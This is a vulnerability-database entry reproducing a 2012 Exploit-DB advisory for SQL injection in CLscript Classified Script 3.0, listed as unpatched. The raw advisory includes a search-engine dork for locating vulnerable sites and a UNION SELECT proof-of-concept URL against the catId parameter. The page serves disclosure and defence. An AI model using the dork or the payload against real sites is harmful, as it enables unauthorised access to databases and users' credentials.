CLscript - Classified Script 3.0 / SQL Injection

vendor:

CLscript - Classified Script

by:

Daniel Godoy

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: CLscript - Classified Script

Affected Version From: 3.0

Affected Version To: 3.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpkode:clscript:3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2012

CLscript – Classified Script 3.0 / SQL Injection

CLscript - Classified Script 3.0 is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, such as user credentials, or even execute arbitrary code on the server.

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: CLscript - Classified Script 3.0 / SQL Injection
# Date: 03/07/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Sofware web:
http://www.phpkode.com/scripts/item/clscript-classified-script/
# Tested on: Linux
# Dork: allinurl: classified-listing.php?catId=
#
# www.chap.cl 
# Este Advisory fue descubierto por Daniel Godoy, integrante de
Project CHAP Security
# be secured / stay secure
# contacto@chap.cl

[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group

 
[PoC]

http://localhost/classified-listing.php?catId=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--

-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com